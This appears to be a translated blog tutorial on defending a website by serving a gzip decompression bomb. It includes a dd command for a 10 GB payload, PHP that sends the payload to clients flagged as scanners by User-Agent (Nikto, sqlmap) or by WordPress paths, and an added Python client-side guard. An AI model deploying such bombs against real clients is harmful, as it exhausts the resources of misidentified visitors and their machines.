
Protecting your site with ZIP bombs

Old methods still work


[Update] Now I'm on some sort of special services list because I wrote an article about some kind of “bomb”, right?

If you have ever hosted a website or administered a server, you know all about the bad actors who keep trying to do bad things to it.

When I, at the age of 13, first set up my little Linux box with SSH access, I watched the logs and saw IP addresses every day (mostly from China and Russia) trying to connect to my sweet little box (which was in fact an old ThinkPad T21 laptop humming away under the bed). I reported these IPs to their providers.
In fact, if you have a Linux server with open SSH, you can see for yourself how many connection attempts occur every day:

grep 'authentication failures' /var/log/auth.log



Wordpress


Scanners hit every site with requests for WordPress paths such as wp-admin, whether or not the site actually runs WordPress.



Nikto



You could deploy an IDS or Fail2ban, but this article is about a different tool: the ZIP bomb.

What is a ZIP bomb?


A ZIP bomb is a very small compressed archive that expands to an enormous amount of data when unpacked, exhausting the memory or disk of whatever tries to decompress it.

The classic example is 42.zip: a 42 KB archive that unpacks to 4.5 PB (4,500,000 GB).

How does a ZIP bomb work?


In practice we will not use ZIP at all, but GZIP, because browsers and HTTP clients decode it natively.

Create a 10 GB GZIP file of zeros with the following command:

dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip




The resulting file is only about 10 MB on disk, yet it decompresses to 10 GB.
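To show where that ratio comes from and how a client protects itself against it, here is an added Python example (not code from the article): it builds the same kind of zero-filled gzip stream in memory that `dd if=/dev/zero | gzip` produces, reports the compression ratio, and then reads it through a bounded decompressor that stops at a caller-supplied output cap instead of expanding the whole stream. The function names, the 16 MiB size and the sample HTML response are constructed for the example.

```python
# Added example (not from the article): the mechanics behind `dd if=/dev/zero | gzip`
# and a client-side guard against exactly this kind of payload.
import gzip
import io


class DecompressionBombError(ValueError):
    """Raised when a gzip stream would expand past the caller's output cap."""


def make_zero_gzip(uncompressed_bytes: int, chunk_size: int = 1 << 20) -> bytes:
    """In-memory equivalent of `dd if=/dev/zero bs=1M count=N | gzip`.

    Zeros are written in 1 MiB chunks (like dd's bs=1M), so the full
    uncompressed run never has to exist in memory at once.
    """
    buf = io.BytesIO()
    zeros = b"\x00" * chunk_size
    with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
        remaining = uncompressed_bytes
        while remaining > 0:
            n = min(chunk_size, remaining)
            gz.write(zeros[:n])
            remaining -= n
    # GzipFile does not close a caller-supplied fileobj, so buf is still readable.
    return buf.getvalue()


def compression_ratio(compressed: bytes, uncompressed_bytes: int) -> float:
    """How many bytes each compressed byte turns into on decompression."""
    return uncompressed_bytes / len(compressed)


def bounded_gunzip(data: bytes, max_output: int) -> bytes:
    """Decompress gzip data, refusing to expand beyond max_output bytes.

    gzip.decompress() allocates whatever the stream expands to; reading
    through GzipFile with an explicit size instead decompresses incrementally,
    so memory stays bounded by max_output even when the input is a bomb.
    """
    with gzip.GzipFile(fileobj=io.BytesIO(data), mode="rb") as gz:
        out = gz.read(max_output + 1)  # one extra byte reveals that the cap was exceeded
    if len(out) > max_output:
        raise DecompressionBombError(
            f"gzip stream expands past the {max_output}-byte limit"
        )
    return out


# Constructed sample of an ordinary compressed response, for comparison.
SAMPLE_PAGE_GZ = gzip.compress(b"<html><body>hello</body></html>")


def demo(uncompressed_bytes: int = 16 << 20, max_output: int = 1 << 20) -> dict:
    """Build a gzip of 16 MiB of zeros and try to read it with a 1 MiB cap."""
    bomb = make_zero_gzip(uncompressed_bytes)
    try:
        bounded_gunzip(bomb, max_output)
        caught = False
    except DecompressionBombError:
        caught = True
    return {
        "compressed_size": len(bomb),
        "ratio": compression_ratio(bomb, uncompressed_bytes),
        "bomb_rejected": caught,
        "normal_page_ok": bounded_gunzip(SAMPLE_PAGE_GZ, max_output).startswith(b"<html>"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The ratio is what makes the trick work: DEFLATE compresses a run of identical bytes to roughly a thousandth of its size, so a few kilobytes on the wire become many megabytes in the client. Any scanner or crawler that calls `gzip.decompress()` on a response body trusts the server with its memory; reading with a size cap, as `bounded_gunzip` does, is the fix on the client side.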

A tiny PHP script is all it takes to serve it:

<?php
//prepare the client to receive GZIP data. This will not be suspicious
//since most web servers use GZIP by default
header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));
//Turn off output buffering
if (ob_get_level()) ob_end_clean();
//send the gzipped file to the client
readfile('10G.gzip');

To serve the bomb only to scanners, wrap it in a check on the User-Agent and the requested path:

<?php
$agent = (string) filter_input(INPUT_SERVER, 'HTTP_USER_AGENT');
//request path without the leading slash, so 'wp-admin/...' matches by prefix
//(the snippet as published left $url undefined)
$url = ltrim((string) parse_url($_SERVER['REQUEST_URI'] ?? '', PHP_URL_PATH), '/');

//check for nikto, sql map or "bad" subfolders which only exist on wordpress
//(stripos: Nikto identifies itself with a capital N)
if (stripos($agent, 'nikto') !== false || stripos($agent, 'sqlmap') !== false || startsWith($url, 'wp-') || startsWith($url, 'wordpress') || startsWith($url, 'wp/'))
{
      sendBomb();
      exit();
}

function sendBomb(){
        //prepare the client to receive GZIP data. This will not be suspicious
        //since most web servers use GZIP by default
        header("Content-Encoding: gzip");
        header("Content-Length: ".filesize('10G.gzip'));
        //Turn off output buffering
        if (ob_get_level()) ob_end_clean();
        //send the gzipped file to the client
        readfile('10G.gzip');
}

function startsWith($a, $b) {
    return strpos($a, $b) === 0;
}

The script looks at two things: the User-Agent, for known scanners, and the requested path, for WordPress-only locations. Either one gets the bomb instead of a page.

So, does it work? The clients the bomb was tested against:

IE 11
Chrome
Edge
Nikto
SQLmap
Safari
Chrome (Android)

Chrome

Source: https://habr.com/ru/post/332580/
